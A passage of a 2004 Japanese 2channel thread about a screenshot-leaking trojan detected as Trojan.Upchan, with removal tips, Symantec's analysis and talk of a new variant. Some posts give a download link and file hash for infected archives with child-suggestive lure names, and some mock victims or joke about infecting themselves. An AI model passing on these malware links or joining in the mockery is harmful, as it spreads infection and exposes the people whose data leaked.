788 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 10:16:24 ID:qJ0+JsGI]: で、誰かウイルス駆除ソフト屋さんに報告したの?
789 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 10:23:29 ID:iqYKdWhe]: >>780
画像自体は無害。
って、こんな程度の知識の人が踏むんだろうなぁ。
790 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 10:29:04 ID:ky5A4Ls4]: >>789
ttp://www.microsoft.com/japan/security/security_bulletins/ms04-028e.asp

こんなのがあるから一概には大丈夫とは言えないかもしれない
791 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 10:30:06 ID:0lvmtZMl]: >>789
っていう、おまえも相当やばいのだが
792 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 10:32:33 ID:cDvdfQLH]: >>789
　　　　　　　　　　　　　　　　　　　　　　　　　　,､ｧ
　　　　　　　　　　　　　　　　　　　　　　　　,､ '";ｨ'
_＿_＿＿___　　　　　　　　　　　　　　　／::::::/l:l
─- ､::::;;;;;;;;;｀ﾞﾞ''‐ ､　　 __,,,,......,,,,_／:::::::::/: !|
　　. : : : : : : ｀ﾞ'ヽ､:::ﾞヾ´::::::::::::::::::::::｀ﾞﾞﾞ'''‐'､. l|　　　またまた　ご冗談を
､､ . : : : : : : : : r'":::::::::::::::::::::::::,r':ぃ::::ヽ::::::::ヽ!　　　　　　　　　　　　　　　　　,､- ､
.ヽ:ﾞヽ; : : : : : :ノ:::::::::::::::::::::;;､-､､ﾞ::: 　　 rｰ-:'､　　　　　　　　　　　　　　／　　 }￢､
.　＼::ﾞ､: : : :./::::::::::::::;､-''"::::::::::　　　,...,:::,::.,　:::':､　　　　　　　　　　　_,,/,,　 ,､.,/ 　 }
　　　ヽ:ヽ､ /:::::::::::::::::::::::::　　　_　　｀ﾞ''‐''"　 __,,',,,,___　　　　　　　／~　　ヾ::::ﾂ,､-/
　　　　｀ヽ､:::::::::;;;､､--‐‐'''''',,iﾆ-　　　 _|　　､-l､,},,　￣""'''￢-, '　 ''‐-､ .,ﾉ'ﾞ,i';;;;ﾂ
　　　_,,,､-‐l'''"´:::::::'　　,､-'" ,.X,_,,､-v'"''ﾞ''yr-ヽ / ﾞﾞ'ヽ､,　　　 ,.'　　　　 jﾞ,,, ´　7
,､-''"　　　.l:::::::::::;､-''"　 ,.-'　　ﾞ､""ヾ'r-;;:l　　冫、　　ヽ､ /　　 __,,.ノ:::::ヽ. /
　　　　　　　l;､-'ﾞ:　　 ,／　　　　　ゞ=‐'"~ﾞﾞ')　./.　＼　　　　/　　'''"/::::;:::;r-''‐ヽ
　　　　　,､‐ﾞヽ:::::..,.r'ﾞ　　　　　　　　 ,,. ,r／ ./　　　ヽ.　　 ,'　　　 '､ノ''"　　　ﾉ
　　 ,､‐'ﾞ　　　ﾝ;"::::::.　　　　　　　"´ 'ﾞ ´　/　　　　　ﾞ､　,'　　　　　　　／
　　'　　　　　／/:::::::::　　　　　　　　　　　　{.　　　　　　 V　　　　　　／
　　　　／ ./:::::::::::::　　　　　　　　　　　　',　　　　　　 /　　　　　　　 /
.　　　　／　 /:::::::::::::::::.　　　　　　　　　　　　',.　　　　 /　　 ,.､　　　　 /
793 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 10:35:22 ID:iqYKdWhe]: >>790-792
いやあ、もちろんgdiplus.dllは知ってますって。わざわざ書かなくていいかと思ったんだけど。
こんなにレスが付くとは…。
794 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 10:36:31 ID:cDvdfQLH]: >>793
　　　　　　　　　　　　　　　　　　　　　　　　　　,､ｧ
　　　　　　　　　　　　　　　　　　　　　　　　,､ '";ｨ'
_＿_＿＿___　　　　　　　　　　　　　　　／::::::/l:l
─- ､::::;;;;;;;;;｀ﾞﾞ''‐ ､　　 __,,,,......,,,,_／:::::::::/: !|
　　. : : : : : : ｀ﾞ'ヽ､:::ﾞヾ´::::::::::::::::::::::｀ﾞﾞﾞ'''‐'､. l|　　　またまた　ご冗談を
､､ . : : : : : : : : r'":::::::::::::::::::::::::,r':ぃ::::ヽ::::::::ヽ!　　　　　　　　　　　　　　　　　,､- ､
.ヽ:ﾞヽ; : : : : : :ノ:::::::::::::::::::::;;､-､､ﾞ::: 　　 rｰ-:'､　　　　　　　　　　　　　　／　　 }￢､
.　＼::ﾞ､: : : :./::::::::::::::;､-''"::::::::::　　　,...,:::,::.,　:::':､　　　　　　　　　　　_,,/,,　 ,､.,/ 　 }
　　　ヽ:ヽ､ /:::::::::::::::::::::::::　　　_　　｀ﾞ''‐''"　 __,,',,,,___　　　　　　　／~　　ヾ::::ﾂ,､-/
　　　　｀ヽ､:::::::::;;;､､--‐‐'''''',,iﾆ-　　　 _|　　､-l､,},,　￣""'''￢-, '　 ''‐-､ .,ﾉ'ﾞ,i';;;;ﾂ
　　　_,,,､-‐l'''"´:::::::'　　,､-'" ,.X,_,,､-v'"''ﾞ''yr-ヽ / ﾞﾞ'ヽ､,　　　 ,.'　　　　 jﾞ,,, ´　7
,､-''"　　　.l:::::::::::;､-''"　 ,.-'　　ﾞ､""ヾ'r-;;:l　　冫、　　ヽ､ /　　 __,,.ノ:::::ヽ. /
　　　　　　　l;､-'ﾞ:　　 ,／　　　　　ゞ=‐'"~ﾞﾞ')　./.　＼　　　　/　　'''"/::::;:::;r-''‐ヽ
　　　　　,､‐ﾞヽ:::::..,.r'ﾞ　　　　　　　　 ,,. ,r／ ./　　　ヽ.　　 ,'　　　 '､ノ''"　　　ﾉ
　　 ,､‐'ﾞ　　　ﾝ;"::::::.　　　　　　　"´ 'ﾞ ´　/　　　　　ﾞ､　,'　　　　　　　／
　　'　　　　　／/:::::::::　　　　　　　　　　　　{.　　　　　　 V　　　　　　／
　　　　／ ./:::::::::::::　　　　　　　　　　　　',　　　　　　 /　　　　　　　 /
.　　　　／　 /:::::::::::::::::.　　　　　　　　　　　　',.　　　　 /　　 ,.､　　　　 /
795 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 10:37:15 ID:iqYKdWhe]: んー、でもよく考えると俺が間違ってるな。MSのGDI+の事も書けばよかった。
796 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 10:37:27 ID:xduUn+v/]: 今回のに限っていえば、晒されてるjpegは今のとこ無害だからな。
便乗してアプロに仕込むやつもいそうだが
797 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 10:41:34 ID:xduUn+v/]: つーか、GDI+対策しないで、今頃jpeg開く香具師が悪いと思われ
パッチがあがった時点から危険度急上昇だぞ
798 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 10:42:55 ID:EMRLV6EZ]: jpgで感染！？(ﾟдﾟ)すんのかよ！？
799 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 10:45:36 ID:LvJ+JBBu]: >>798
するよ～、jpg見るどころか、うｐロダ逝ったら即感染ですよ
怖いよ～ウィルスわ
800 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 10:52:21 ID:ky5A4Ls4]: まあ、SP2な俺には関係ないが
801 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 10:54:42 ID:iqYKdWhe]: >>798
まだしてないなら、すぐWindowsUpdataした方がいいよ。
って、「重要なパッチは、もうすでに当ててるだろ？」って認識で話するのは、やっぱり
やめた方がよさそうだな。そこが間違ってた。それに今後も新しく判明した画像処理の
脆弱性をついたウィルスが、現れない保証もない。これからは画像も油断できないと
言う事か。
802 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 10:55:44 ID:jZRbqOye]: >>801
SP2を入れると不具合出そうで恐いよ～。
803 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 10:56:54 ID:ky5A4Ls4]: ttp://www.openwall.com/advisories/OW-002-netscape-jpeg/crash/
とりあえずテストページ。ここの"I am ready to die."を踏んでクラッシュしたら
SP2を当てるかWindowsUpdateしないと危険。ちなみにﾉｰﾄｿが反応するから、
ウイルス対策ソフト入れてる人は安心してもいいかもしれない
804 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 11:07:06 ID:EMRLV6EZ]: ２ｃｈブラウザのjpg垣間見機能でもだめか？
805 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 11:12:11 ID:jZxILG0u]: >766
LANケーブル抜いてネット切断、それで首吊れ
806 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 11:12:12 ID:zW53Q5jb]: 苺きんたま対策(仮)
www.geocities.jp/ichigo_kintama/

まとめサイトできたようだ
807 名前：[名無し]さん(bin+cue).rar [04/09/23 11:14:52 ID:2DsdDYOp]: >>469
ダウンロードできないんだけど、もう削除されたかな？
808 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 11:22:10 ID:PFKtStB6]: >>766
再起動してタスクマネージャー開いてプロセス見ろ。
それでshellsystem.exeを終了させろ。
これで動作は速くなる。
あとはレジストリでshellsystem.exeを削除すれば終了
809 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 11:24:03 ID:sH8yfJe2]: マルチプロセスだからタスクマネージャからは消せんぞ。
810 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 11:27:07 ID:PFKtStB6]: >>809
遊びで感染したんだが、再起動させたら俺は消せた。
なんでかはわからん
811 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 11:31:26 ID:cDvdfQLH]: 112 名前：eatkyo287016.adsl.ppp.infoweb.ne.jp＠Share使用中 ◆i.ESDXOLYY [] 投稿日：04/09/23 10:43:42 ID:La2FDeZx
{Now!}俺のクリップボード(50byte 10行抜粋版, 何もコピーしてません)
～何も無いので環境変数晒し～

コンピュータ名: VIP
ユーザー名: takehiro

ﾜﾛﾀ
812 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 12:35:25 ID:2aG10cCS]: 俺どうせ割れ窓だから笑えるユーザー名でわざと踏んで晒してみるか
ほりえもんとか毎日新聞で凶悪ぺド画像とか
813 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 12:43:24 ID:IQ9BvSXd]: しまった、祭りに乗り遅れた。
nyか洒落にあがってないかな(w
814 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 12:45:03 ID:tyH5EMtg]: >>813
京都府警にしてよ
815 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 12:46:19 ID:k8gkpGNZ]: このトロイの動作解説ページってまだないかな。

なんかおもしろそうだから感染させてみたいんだが。
816 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 12:46:30 ID:IqZ2HObi]: × しまった、祭りに乗り遅れた。

○ うお
　　完璧乗り遅れた
817 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 12:49:27 ID:k8gkpGNZ]: Winnyを立ち上げてない限り，被害はないんだろ？
何で祭りになってんだ？？
818 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 12:51:17 ID:cDvdfQLH]: 初級ネットワーク板ローカルルール申請
qb5.2ch.net/test/read.cgi/operate/1095695740/

Share10_a56 + [9月21日付]ノードリストの文字列が多い・・・あやしいな
819 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 12:56:30 ID:J5HdIDac]: 「Share10_a56 + [9月21日付]ノードリスト」ってファイルにウィルス入ってるんだろうな
820 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 12:57:37 ID:pr4shzQV]: >>817
ｎｙは関係ない
821 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 12:59:51 ID:lSmv7nYn]: ファイル名変えて、あちこちに貼られてら。
822 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 13:00:20 ID:xCg9vDsC]: なんか、もれのデスクトップ画像が２ｃｈアプロと言う
どこかにアップされているらしいです。

それを見て自分を笑いたいのですが、どこにあるか
分かりますでしょうか。
823 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 13:00:37 ID:RdY8SqQw]: 俺はVirtual PC上のWinMEでny実行してるから、晒されても問題ないな。
しかもホストOSはOS Xだし
824 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 13:02:37 ID:cDvdfQLH]: Share10_a56 + [9月21日付]ノードリスト 18禁無修正ガンダム画像映画動画一般コミックエロゲ
PS2PV巨乳アニメゲーム一般ゲームサントラアルバムMAD無修正アプリ写真集DVD.zip
1,219,360
13deb3c8b87346cd5b1a9de9029c855fc7b6128e

これか
825 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 13:08:21 ID:NktT5qfN]: 7-zip反則だな。これなら1/3近くにもなるわけだ。

7-Zip (A) 3.12 Copyright (c) 1999-2003 Igor Pavlov 2003-12-10

Listing archive: F:\DESKTOP\キンタ~1.7Z

Date Time Attr Size Compressed Name
------------------- ----- ------------ ------------ ------------
2004-09-22 15:57:10 ....A 677376 319288 (写真集) (ロリータ) 水原友里.exe
2004-09-22 15:57:10 ....A 677376 0　　 (写真集) (ロリータ) 相田香奈子.exe
2004-09-22 15:57:10 ....A 677376 0　　コピー～ (写真集) (ロリータ) 河瀬菜美.exe
------------------- ----- ------------ ------------ ------------
2032128 319288 3 files

キンタ~1 7Z 319,524 04-09-23 12:58 キンタマ詰合.up1360.7z
キンタ~1 BZA 1,003,287 04-09-23 13:00 キンタマ詰合.up1360.bza
キンタ~1 CAB 1,032,957 04-09-23 13:00 キンタマ詰合.up1360.cab
キンタ~1 YZ1 1,055,366 04-09-23 12:58 キンタマ詰合.up1360.yz1
キンタ~1 ZIP 1,033,786 04-09-22 21:25 キンタマ詰合.up1360.zip
826 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 13:09:25 ID:cDvdfQLH]: ナニソレ
827 名前：[名無し]さん(bin+cue).rar [04/09/23 13:14:14 ID:EKR+VzAM]: これってjpgのリンク踏んだだけで感染するんですか
828 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 13:17:14 ID:cDvdfQLH]: ｎo
829 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 13:29:10 ID:JTze3qp6]: SSの機能を無効にする方法って無いの？
830 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 13:30:03 ID:H4H6HXnY]: 新種のキンタマが開発されたと聞いて飛んできました

ノートン先生がスルー・・・？　ｶﾞｸｶﾞｸﾌﾞﾙﾌﾞﾙ
831 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 13:32:02 ID:joit0XmS]: ファイル踏んだ覚えないのにshellsystem.exeがレジストリにあった場合は
感染してるんでしょうか
プロセスなどにはshellsystem.exeはありませんでした
832 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 13:34:53 ID:Y12C9VC7]: >>831
どうせ検索の履歴だろ
833 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 13:35:15 ID:H4H6HXnY]: >>831
削除するに越した事は無いんじゃないですか？
834 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 13:39:50 ID:joit0XmS]: Microsoft\search Assiant\ACMru\5603の位置にあったので検索履歴みたいです
ありがとうございました
835 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 14:25:04 ID:ungvXIMz]: test
836 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 14:58:32 ID:xduUn+v/]: >>825
その実験は興味深いな、7zなら重複ファイル簡単に探せるね。
CRCを見てて、同じだったらファイル名だけ残して捨てるんだな
つか、一見、普通のファイル集合体のようで、展開したら
むちゃくちゃ容量食う圧縮爆弾を簡単に作れるじゃねーか。怖。

ちなみにrarだと800KBぐらい
837 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 15:02:36 ID:mmGHQUsE]: exe ファイル　捨てたい
838 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 15:08:30 ID:jZRbqOye]: 苺きんたまきんたま
www.geocities.jp/ichigo_kintama/
これを。
839 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 15:25:44 ID:UZ3hgOe/]: >>837
602 名前：[名無し]さん(bin+cue).rar[sage] 投稿日：04/09/23(木) 00:03:45 ID:mmGHQUsE
俺は正直このくらいでいい。
観てるほうは面白いし晒された方はちょっと恥ずかしいけど
そんなにダメージでかくない。あとは画像が見れれば最強なんだが。

610 名前：[名無し]さん(bin+cue).rar[] 投稿日：04/09/23(木) 00:09:58 ID:mmGHQUsE
>>604
作者は力入れるとこ間違ってる気がする。

629 名前：[名無し]さん(bin+cue).rar[sage] 投稿日：04/09/23(木) 00:29:36 ID:mmGHQUsE
おいおまいら関祭りには参加しなかったのか？

634 名前：[名無し]さん(bin+cue).rar[sage] 投稿日：04/09/23(木) 00:35:59 ID:mmGHQUsE
tesu
840 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 15:26:49 ID:UZ3hgOe/]: 637 名前：[名無し]さん(bin+cue).rar[sage] 投稿日：04/09/23(木) 00:39:46 ID:mmGHQUsE
てす

639 名前：[名無し]さん(bin+cue).rar[sage] 投稿日：04/09/23(木) 00:42:44 ID:mmGHQUsE
ニュー速で規制されたorz
９０秒ってなげーよ・・・

662 名前：[名無し]さん(bin+cue).rar[sage] 投稿日：04/09/23(木) 01:10:41 ID:mmGHQUsE
しかし久々にflashget使ったよｗ

668 名前：[名無し]さん(bin+cue).rar[sage] 投稿日：04/09/23(木) 01:35:42 ID:mmGHQUsE
もううｐはやんだの？

679 名前：[名無し]さん(bin+cue).rar[sage] 投稿日：04/09/23(木) 02:47:44 ID:mmGHQUsE
あ～面白かった。三日分は笑ったな。

837 名前：[名無し]さん(bin+cue).rar[sage] 投稿日：04/09/23(木) 15:02:36 ID:mmGHQUsE
exe ファイル　捨てたい
841 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 16:00:42 ID:gRp4IpXR]: なになに？笑って見てたら笑えない状況になったのかID:mmGHQUsEは？
842 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 16:06:35 ID:QGmLVuGv]: txtなどのアイコンの変更はどうやるのでしょうか？
843 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 16:18:48 ID:qaAkrrtW]: >>840
837で爆笑
844 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 16:22:49 ID:L1ZU8rVo]: >841
ﾄﾞｿﾞｰ
that3.2ch.net/test/read.cgi/gline/1095873352/l50
845 名前：627 mailto:sage [04/09/23 16:24:41 ID:Q+leSqll]: ノートン先生から解析結果が届いたのでコピペします。
-------------------------------------------------------------------
Subject:[CLOSING]: Symantec Security Response Automation:Tracking No. ********

日付: 22-09-2004
(個人情報に付き削除) 様

ファイルを分析しました。送られたそれぞれのファイルについてわかったことを
以下に報告します。
ファイル名: Q:\2ch\(写真集) (ロリータ) 水原友里.exe
コンピュータ: (個人情報に付き削除)
結果: このファイルは次のウィルスに感染しています:
Trojan.Upchan
デベロッパーノート
:
Q:\2ch\(写真集) (ロリータ) 水原友里.exe is non-repairable threat.
NAV with the latest rapidrelease definition detects this. Please delete this file and replace it if neccessary.
Please follow the instruction at the end of this email message to install the latest rapidrelease definitions.

ご提出いただいたサンプルについて、シマンテック・セキュリティ・レスポンスはウイルス、ワームまたはトロイの木馬に感染していると判断いたしました。
今回の提出されたサンプルに含まれる脅威に個別対応した定義ファイルを作成いたしましたので、
このメールの末尾に書かれた手順にしたがってインストールしてください。

個別対応版定義ファイルのインストール方法：
1. 添付された定義ファイルの更新版を保存します。
2. 保存したファイルをダブルクリックし、画面の指示に従って操作します。
-------------------------------------------------------------------
846 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 16:26:59 ID:t4uJAFpV]: >>845
Upchanって・・・。それにしても対応早いな。
バスターまだ～（AA略）
847 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 16:28:51 ID:Pi3bt/OK]: >保存したファイルをダブルクリックし、画面の指示に従って操作します。
ICHIGOｳｲﾙｰｽに感染した香具師はﾄﾗｳﾏに…
848 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 16:30:52 ID:62NRg8JO]: >>845 おぉ先生きたか
　　　　 >Trojan.Upchan 　あっぷちゃん、もしくはうぷちゃん　
　　　　苺キンタマは却下かｗ
849 名前：627 mailto:sage [04/09/23 16:33:37 ID:Q+leSqll]: 添付されていた定義パッチで
(写真集) (ロリータ) 水原友里.exe
(写真集) (ロリータ) 相田香奈子.exe
コピー～ (写真集) (ロリータ) 河瀬菜美.exe
を「Trojan.Upchan」として検出できることを確認。

というわけで一般向けには次回定義更新時の定義でサポートされると思われ。

>>846
バスターの検体提出方法は不明だが
ノートン先生見たく検疫ソフトで送信できるなら誰か持ってる奴が送信した方がはやいよ。
850 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 16:41:53 ID:soiSa9lC]: 35 名前：水先案名無い人[sage] 投稿日：04/09/23 02:23:45 ID:ccAq4UYb
簡単な説明

とある人物がうｐロダにうｐられているexeを実行

そのexeはキンタマウィルスと同じようなデスクトップ画像を晒されるウィルス入り
このウィルスは8分置きに2chうｐロダにデスクトップ画像をうｐられ角煮のアップローダスレに自動で書き込まれる

そしてこのウィルスにかかっている事を知った当の本人は必死になって削除方法検索
その時の検索ワードが「exe ファイル捨てたい」
この検索結果の画像を上記に書かれているウィルスによって自動でスレに書き込まれスレ住人を爆笑の渦へ

おわり

↑わるいがﾜﾛﾀ
851 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 16:45:57 ID:cDvdfQLH]: 俺でさえも（ｒｙ　は対策しないんだなｗ
852 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 16:52:19 ID:pr4shzQV]: バスター更新ｷﾀ━━━━━━(ﾟ∀ﾟ)━━━━━━ !!!!!
けど、対応してるのかな
853 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 16:53:18 ID:mva2OVxj]: >>852
人柱
854 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 17:16:25 ID:/+AT9169]: で、対応はどうなんだ？
漏れバスター無いから確かめられんのよね…
855 名前：627 mailto:sage [04/09/23 17:24:35 ID:Q+leSqll]: とりあえず定義パッチ。

ttp://rupan.zive.net/~kain/cgi-bin/upload/src/up0555.zip
Pass:NAV32

Name MD5 Bytes
---------- -------------------------------- ----------
apache.zip C12EB402A934A29D4DC44FEAD7BD1964 5,353,391
-------------------------------------------------------
Total 1 Files 5,353,391 Bytes

Name MD5 Bytes
----------- -------------------------------- ---------
updat32.exe FFA6D54E96FB2E825A0ADD93C93D689E 5,502,200
--------------------------------------------------------
Total 1 Files 5,502,200 Bytes
856 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 17:34:08 ID:Q+leSqll]: >>852
ノートン先生はこの騒ぎのあとに定義更新があったけど未対応だった…
#確認するにもブツを持ってないとできないしな
857 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 17:37:40 ID:Pi3bt/OK]: >>856
きました
858 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 17:44:31 ID:t4uJAFpV]: >>852
パターンみたけどUpchanみたいに判りやすい名前は無かったな。
多分、未対応だと思う。
859 名前：test ◆NJ8QhBoOZU mailto:sage [04/09/23 17:44:38 ID:VAVDavsr]: test
860 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 17:46:46 ID:qaAkrrtW]: 「exe ファイル捨てたい」
(・∀・)ｲｲ!!ﾜﾗﾀﾜﾗﾀ
861 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 17:51:20 ID:xduUn+v/]: >>856
テストマシンに定義パッチ当てた。飼ってる苺キンタマは見事にヒット
（はじめrarの中に入れておいたからヒットしなかったよ）
Upchanの詳細情報まではなし。Up 2ch/苺ch という意味か…
862 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 18:04:49 ID:u+ulJzWX]: that3.2ch.net/test/read.cgi/gline/1030921732/572
863 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 18:06:11 ID:AH6SroMo]: Trojan.ichigokintama
Trojan.berryballs
864 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 18:30:39 ID:GPZkaXV9]: ttp://picopico.dip.jp/ragnarok/data/1/1095925509796_AreTool25.zip
これのragnarok\config.txt・・・.exeにひっかかりました。
ダブルクリックした瞬間にひっかかったと気づいたので急いで回線を抜きました。
亜種でしょうか？プロセスを見てもD:\WINDOWS\shellsystem.exeとは出ませんでした。（D:\にOSを入れてます）
かわりにD:\WINDOWS\sugoimonoss.comというコマンドプロンプトのファイルが生成されました。
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\sugoimonoss.com を
レジストリからも消しました。
とりあえず削除してPCを落としました。

セーフモードで起動したらsugoimonoss.comが復活していたので削除しました。上の元ファイルも削除しました。
レジストリを確認してみると同じ場所にはありませんでした。

そして再起動したらsugoimonoss.comは復活してなかったのでもう平気でしょうか？
いまはサブパソコンから書き込みしています。
865 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 18:38:07 ID:IFT2b9V5]: >>864
みんな超能力者じゃないから断言できないけどたぶん大丈夫。
866 名前：627 mailto:sage [04/09/23 18:41:45 ID:Q+leSqll]: >>852
バスターは持ってないのでトレンドマイクロの
オンラインスキャンを利用してスキャンしてみたが未検出でしたので未対応のようです。

なのでバスター使いの誰かが提出するか
トレンドマイクロの中の人が気づくまで対応されないと思われます。

#提出しようと思ったが
#なんか製品登録したやつしか提出できない感じ…
867 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 18:47:10 ID:mva2OVxj]: Share(仮称) ウイルス情報
tmp4.2ch.net/test/read.cgi/download/1095907115/
868 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 18:48:59 ID:HP1mtfoW]: >>866
ウイルス情報は各社が共有する紳士協定みたいなのがあるから
バスターも対応すると思われ
869 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 18:54:10 ID:rPkWk6Jz]: 最初の被害者で晒しまくった挙句、角煮にも降臨したのが
ユーザー名 YUSUKE という香具師だった
そこで、ﾁｬﾈﾗの間では、このｳｲﾙｽをYUSUKEｷﾝﾀﾏﾘｱと名付ける動きがあった
870 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 18:54:42 ID:7p6CJmmF]: >>866
バスターには昨日夜提出しておいたが、流石に一日じゃ解析からパターンファイル作成まで行かないみたいだな・・・
868の言うとおり、もう少し待てば対応するはず・・・
871 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 18:56:07 ID:+Y3dTfL1]: えーと、苺ｷﾝﾀﾏってローカルネットワーク対応？
ぶっちゃけ言うと1台に感染したらLAN接続してる別PCにも勝手に伝播しますか？
872 名前：ﾊﾞｽﾀｰ使い mailto:sage [04/09/23 18:56:44 ID:rQ28x1D5]: >>870
提出乙！
873 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 18:58:13 ID:JaZKld0M]: ｼﾞｭﾌﾞﾅｲﾙのﾕｰｽｹ!を思い出す
874 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 19:09:20 ID:GPZkaXV9]: >>864
これって新種？
875 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 19:12:44 ID:xduUn+v/]: >>864
落ちてこないよ。解析したいのに。
876 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 19:20:25 ID:xduUn+v/]: >>864
で、見てみた。
苺キンタマと中身はそっくり、ただし、>>855のノートン先生の定義パッチでは無反応
新種というか亜種確定。

やはり、類似品を簡単に作れるような設計になってるみたいだな。
こりゃ、しばらく祭り継続だな
877 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 19:23:59 ID:T4ToCva4]: >>876
うp先はどこなん？
878 名前：[名無し]さん(bin+cue).rar [04/09/23 19:31:53 ID:LXjx4AWF]: シマンテック　ウイルス感染の疑いがあるファイルを Symantec Security Response に提出する方法
service1.symantec.com/SUPPORT/INTER/entsecurityjapanesekb.nsf/jp_docid/20020624043939949
879 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 19:33:26 ID:/oIKzfHB]: 亜種にはfusiana機能も付けてほしい

あとwebカメラ設置者はそっちが起動されるとかね～
　
880 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 19:34:29 ID:62NRg8JO]: 休みが明けて電源を入れたら壮大な祭りになる悪寒…
公的機関、企業の内部情報…個人情報と個人の性癖はもう晒されてるし
ど素人は原種がAVで引っかかっても、亜種には対応してないから安心しそうだ
まだまだ祭りは終わらないねこりゃ…
881 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 19:40:09 ID:GPZkaXV9]: >>876
再起動したら自動でsugoimonoss.comが起動して感染する仕組みだったのでしょうか？
それともそれ単体で動作するのですか？
踏んだ直後にプロセスを見ても何もありませんでした。
レジストリのRun\のなかにsugoimonoss.comがあったので気づいたのですが・・・。
882 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 19:40:27 ID:+moW+9Lf]: 亜種はノートン反応無しとは
楽しい日々はまだまだ続くかな？
883 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 19:40:40 ID:dlC1dSfw]: すごいことになりそうだな…
884 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 19:40:45 ID:RzyOzwfF]: >>881
うっせラグナロクのチーターは死ねよｗｗ
885 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 19:42:44 ID:GPZkaXV9]: ラグナロク知ってる人しかわからないレスごめんなさい
>>884
あのあぷろだには普段はチートツールはうｐされないから多分罠ツールだと思って落としてみて、config開いたらウィルスだった。
罠ツールを集めるのが趣味なんです。
886 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 19:44:42 ID:bDi76u+h]: これは早めに次スレがいるね。
